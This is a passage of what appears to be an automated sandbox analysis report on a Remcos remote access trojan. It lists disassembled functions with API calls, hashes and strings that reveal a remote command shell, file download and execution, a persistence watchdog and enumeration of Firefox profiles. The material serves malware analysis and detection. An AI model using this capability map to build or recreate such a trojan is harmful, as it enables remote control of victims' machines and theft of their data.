                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 90b816baf6681459c689896bd7ee7621983de5913a9f55156db5b466bfdb1e74
                                                                                                • Instruction ID: da5e3a6b8615f7fc9763e362b131f946d251b316bd2acc507b7b22157b73f9fc
                                                                                                • Opcode Fuzzy Hash: 90b816baf6681459c689896bd7ee7621983de5913a9f55156db5b466bfdb1e74
                                                                                                • Instruction Fuzzy Hash: 1BE03931941224BB9B200BA29D09EDB7F6DEF06BA1B010455B809A2111DAA18E54EAF4
                                                                                                APIs
                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041AB64
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: GlobalMemoryStatus
                                                                                                • String ID: @
                                                                                                • API String ID: 1890195054-2766056989
                                                                                                • Opcode ID: a4fe8e15525f2be1febd29730eb74c732a6063ed027868c332be47892e1af589
                                                                                                • Instruction ID: b665d68c061e3f9f56ba9c4249da2251c097319f67e9030db6e937b6cf7da2fa
                                                                                                • Opcode Fuzzy Hash: a4fe8e15525f2be1febd29730eb74c732a6063ed027868c332be47892e1af589
                                                                                                • Instruction Fuzzy Hash: 00D067B59013189FCB20DFA8E945A8DBBF8EB48214F004529E946E3744E774E945CB94
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 0044BBEF
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                • RtlReAllocateHeap.NTDLL(00000000,00476D58,?,00000004,00000000,?,0044EB1A,00476D58,00000004,?,00476D58,?,?,00443335,00476D58,?), ref: 0044BC2B
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap$_free
                                                                                                • String ID:
                                                                                                • API String ID: 1482568997-0
                                                                                                • Opcode ID: c663a77da406be6e54bbe5e4694e400583292b09c8c587c623d78d47e3d5e62a
                                                                                                • Instruction ID: 767aa377775814b37deb1c17d78f1b9627af84273febb40deea43816b68d1426
                                                                                                • Opcode Fuzzy Hash: c663a77da406be6e54bbe5e4694e400583292b09c8c587c623d78d47e3d5e62a
                                                                                                • Instruction Fuzzy Hash: D3F0C23160051166FB212A679C81F6B2B59CF82B74B15402FF805AA691DF3CD841A1ED
                                                                                                APIs
                                                                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEventStartupsocket
                                                                                                • String ID:
                                                                                                • API String ID: 1953588214-0
                                                                                                • Opcode ID: 9dcc25316a99288ac387cf2e613c868b0e107fead0b532e7680f1acbcbd447ec
                                                                                                • Instruction ID: e62a462d4859cb901c95814de100b0ae44c334504336dc08fc7633b5118be932
                                                                                                • Opcode Fuzzy Hash: 9dcc25316a99288ac387cf2e613c868b0e107fead0b532e7680f1acbcbd447ec
                                                                                                • Instruction Fuzzy Hash: 100171B0508B809FD7358F38B8456977FE0AB15314F044DAEF1D697BA1C7B5A481CB18
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00433FF2
                                                                                                  • Part of subcall function 00437DE7: RaiseException.KERNEL32(?,?,00434621,?,?,?,?,?,?,?,?,00434621,?,0046E654,0041AF80,?), ref: 00437E47
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0043400F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                                • String ID:
                                                                                                • API String ID: 3476068407-0
                                                                                                • Opcode ID: 2f8450b131b2c7cae6b2994a14d2746b0b5bc3d5d5124e6b0ed98aed2215fcc2
                                                                                                • Instruction ID: 1c2073f64fee591a786a8a3f9c67cac18272885bad9296719f7a79fda1cbf913
                                                                                                • Opcode Fuzzy Hash: 2f8450b131b2c7cae6b2994a14d2746b0b5bc3d5d5124e6b0ed98aed2215fcc2
                                                                                                • Instruction Fuzzy Hash: 1BF0BB25C0430D768B04BEA6E80A9AD33BC5E08329F50513BB825914D1FB7C9759C5CD
                                                                                                APIs
                                                                                                • GetForegroundWindow.USER32 ref: 0041AE7F
                                                                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AE92
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$ForegroundText
                                                                                                • String ID:
                                                                                                • API String ID: 29597999-0
                                                                                                • Opcode ID: 27a61dc13c3baf2ab93a997f5cd2cb0d43e4b22d1e77ef92c0de48519faa66db
                                                                                                • Instruction ID: 7a6786a6daea7d79da8b38e9164549a295f8c3929764bf887eb2819544a3ffc0
                                                                                                • Opcode Fuzzy Hash: 27a61dc13c3baf2ab93a997f5cd2cb0d43e4b22d1e77ef92c0de48519faa66db
                                                                                                • Instruction Fuzzy Hash: 4AE04875A0031867FB20B7659C4EFD6766C9704B05F0400ADB619E21C3EDB4EA048BE4
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 176396367-0
                                                                                                • Opcode ID: 694b58b4804d0161d9866015f426625d870619d59cf6cfc82a5e2460fb3dabfc
                                                                                                • Instruction ID: 7b719d08391bbb12b01dd12fa1e9474f3c31e37c6e717f7fed2b29792a4b3228
                                                                                                • Opcode Fuzzy Hash: 694b58b4804d0161d9866015f426625d870619d59cf6cfc82a5e2460fb3dabfc
                                                                                                • Instruction Fuzzy Hash: B71193329002059BCB05FF66D8529EE77A4EF54319B10443FF842662E2EF78A915CB98
                                                                                                APIs
                                                                                                • VirtualProtect.KERNEL32(?,00410BDA,?,00000000,?,00000000,00000000,00410969), ref: 00410835
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ProtectVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 544645111-0
                                                                                                • Opcode ID: a7372f67efa92369d48c62df5f7f2955e1d45dc101a9cb84dd024311987fd690
                                                                                                • Instruction ID: a919ac539a4debb618ab194b449307f8042503fa1c6d266810504fc1f887d753
                                                                                                • Opcode Fuzzy Hash: a7372f67efa92369d48c62df5f7f2955e1d45dc101a9cb84dd024311987fd690
                                                                                                • Instruction Fuzzy Hash: 0C11C1727011019FD614DA18CC90BA7B766FF80710F59815AE125CB392DBB5FCD2CA94
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                                                                • Instruction ID: 40638bbf90b8c7646580dfe44e72c34c865d7c07d7b9b06d8b79509a7ad90776
                                                                                                • Opcode Fuzzy Hash: 0df71086ebe011a22fdff847967a9c5229befe104b2723ee1c4cd472e7f23894
                                                                                                • Instruction Fuzzy Hash: 52E0E5B1B00220A6FB202A6A8C02B5B36498F437B4F070033AC0A9A291CE6CCC4081AF
                                                                                                APIs
                                                                                                • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Startup
                                                                                                • String ID:
                                                                                                • API String ID: 724789610-0
                                                                                                • Opcode ID: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                                                                • Instruction ID: a6df37c1a3c4b0bfee4e794801b63ea3b6ec8424062e123ecf3ffc10766d7ffb
                                                                                                • Opcode Fuzzy Hash: 512c305c5d81d862cf08042479f934390d4c65f7aad148c3c3ac63496dcf4775
                                                                                                • Instruction Fuzzy Hash: F7D012325586094ED620AAB5AD0F8A4775CD317611F0003BA6CB5825D3FA84561CC6AB
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: recv
                                                                                                • String ID:
                                                                                                • API String ID: 1507349165-0
                                                                                                • Opcode ID: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                                                                • Instruction ID: 85cd51724732601f8c8003b199973b8832ebbe95acea7078dd2fcbbf2f3153fb
                                                                                                • Opcode Fuzzy Hash: e479f6d312995adc38c95d140b7cef8bd4a3583c6482d3884fe68aabfa392038
                                                                                                • Instruction Fuzzy Hash: FCB09279118202FFCA051B60CC0887ABEB6ABCC381F108D2DB986A01B0DE37C451AB26
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: send
                                                                                                • String ID:
                                                                                                • API String ID: 2809346765-0
                                                                                                • Opcode ID: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                                                                • Instruction ID: aaa3dbc129b5069e484ee587900df28e469ef685d0a3e158187009c9450646dc
                                                                                                • Opcode Fuzzy Hash: 733b60b5868be77d00c88bb6e02a93299a3caf11162c6b1e2887e039244bfe1f
                                                                                                • Instruction Fuzzy Hash: 30B09279118302BFCA051B60CC0887A7EB6ABC9381B108C2CB546611B0DE37C490EB36
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Deallocate
                                                                                                • String ID:
                                                                                                • API String ID: 1075933841-0
                                                                                                • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(?,?,?,?,00410CD6,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410BA6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: c6613924f6d0b7411c81be3707eeeac8e7e35806319a94a858a4c8f2f7b3dfbc
                                                                                                • Instruction ID: e51225b8dc451cf5f22672caa0f035088f4092e39e361f2bdb4b6f96ed7b397f
                                                                                                • Opcode Fuzzy Hash: c6613924f6d0b7411c81be3707eeeac8e7e35806319a94a858a4c8f2f7b3dfbc
                                                                                                • Instruction Fuzzy Hash: 12B00832419382EFCF02DF90DD0492ABAA2BB88712F094C5CB2A1501718B228428EB16
                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                  • Part of subcall function 004336DA: EnterCriticalSection.KERNEL32(00471D18,00476D54,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 004336E4
                                                                                                  • Part of subcall function 004336DA: LeaveCriticalSection.KERNEL32(00471D18,?,0040AEAC,00476D54,00456FA7,?,00000000,00000000), ref: 00433717
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                • CreatePipe.KERNEL32(00476D14,00476CFC,00476C20,00000000,0046656C,00000000), ref: 0040515E
                                                                                                • CreatePipe.KERNEL32(00476D00,00476D1C,00476C20,00000000), ref: 00405174
                                                                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476C30,00476D04), ref: 004051E7
                                                                                                  • Part of subcall function 00433724: EnterCriticalSection.KERNEL32(00471D18,?,00476D54,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043372F
                                                                                                  • Part of subcall function 00433724: LeaveCriticalSection.KERNEL32(00471D18,?,0040AE8B,00476D54,?,00000000,00000000), ref: 0043376C
                                                                                                • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                  • Part of subcall function 00433AB0: __onexit.LIBCMT ref: 00433AB6
                                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90,00466570,00000062,00466554), ref: 0040538E
                                                                                                • Sleep.KERNEL32(00000064,00000062,00466554), ref: 004053A8
                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                • String ID: lG$ mG$ mG$ mG$0lG$SystemDrive$cmd.exe$xlG$xlG$xlG$xlG$xlG
                                                                                                • API String ID: 3815868655-3731297122
                                                                                                • Opcode ID: f396be4790dd849b55e2ef35929ee7c5f43d950ac269b212cb8a1a7a24f23951
                                                                                                • Instruction ID: f3d75f47542da312923ddfb9c6ddab2c5323933c8a72fe1ed5abf95ef94fff6a
                                                                                                • Opcode Fuzzy Hash: f396be4790dd849b55e2ef35929ee7c5f43d950ac269b212cb8a1a7a24f23951
                                                                                                • Instruction Fuzzy Hash: 3491C571600605AFC610BB65ED42A6F3BAAEB84344F01443FF949A22E2DF7D9C448F6D
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                  • Part of subcall function 0041B63A: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B694
                                                                                                  • Part of subcall function 0041B63A: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B6C6
                                                                                                  • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004752F0,00475308), ref: 0041B717
                                                                                                  • Part of subcall function 0041B63A: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B76C
                                                                                                  • Part of subcall function 0041B63A: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004752F0,00475308), ref: 0041B773
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00466454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002B8,00000000,{NAL,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000), ref: 0040450E
                                                                                                  • Part of subcall function 00404468: SetEvent.KERNEL32(000002B8,?,?,00000004,?,?,00000004,00474EE0,004755B0,00000000,?,?,?,?,?,00414E7B), ref: 0040453C
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00466AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                  • Part of subcall function 0041BD82: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BE77
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                • String ID: @PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$VNG$open$pPG$pPG$pPG$pPG$NG
                                                                                                • API String ID: 2918587301-3905578539
                                                                                                • Opcode ID: c1c710ada340ca9b968f740ec62e3dd7c4b2cc575997bf46a4ea3a0ef86f0e89
                                                                                                • Instruction ID: 1d2e2627ec10ef381271a766c0004beadc8049fa085ae304c46d09a1b017b010
                                                                                                • Opcode Fuzzy Hash: c1c710ada340ca9b968f740ec62e3dd7c4b2cc575997bf46a4ea3a0ef86f0e89
                                                                                                • Instruction Fuzzy Hash: 0F42A271A043005BC614FB76C8979AE76A59F90708F40493FF946771E2EE3CAA09C6DB
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 0041101D
                                                                                                  • Part of subcall function 004128AD: RegCreateKeyA.ADVAPI32(80000001,00000000,TeF), ref: 004128BB
                                                                                                  • Part of subcall function 004128AD: RegSetValueExA.KERNEL32(TeF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128D6
                                                                                                  • Part of subcall function 004128AD: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004670E0,00000001,000000AF,00466554), ref: 004128E1
                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00411059
                                                                                                • CreateThread.KERNEL32(00000000,00000000,0041170F,00000000,00000000,00000000), ref: 004110BE
                                                                                                  • Part of subcall function 0041258F: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004125AF
                                                                                                  • Part of subcall function 0041258F: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,00475308), ref: 004125CD
                                                                                                  • Part of subcall function 0041258F: RegCloseKey.KERNEL32(?), ref: 004125D8
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00411068
                                                                                                  • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00411332
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                • String ID: 0TG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                • API String ID: 65172268-427618296
                                                                                                • Opcode ID: ed6e4d5b3cd70398a46e6fef0cdf46d45dba42b7dcf9f9dad764f61a4771f9fc
                                                                                                • Instruction ID: de889ccbd4d484bbc366ed6bf297281231fcf4352047712fae5372da0dd81bf3
                                                                                                • Opcode Fuzzy Hash: ed6e4d5b3cd70398a46e6fef0cdf46d45dba42b7dcf9f9dad764f61a4771f9fc
                                                                                                • Instruction Fuzzy Hash: 3D717E3160420157C214FB72CC579AE77A8AF94719F40053FF986A21E2EF7C9A49C6AF
                                                                                                APIs
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
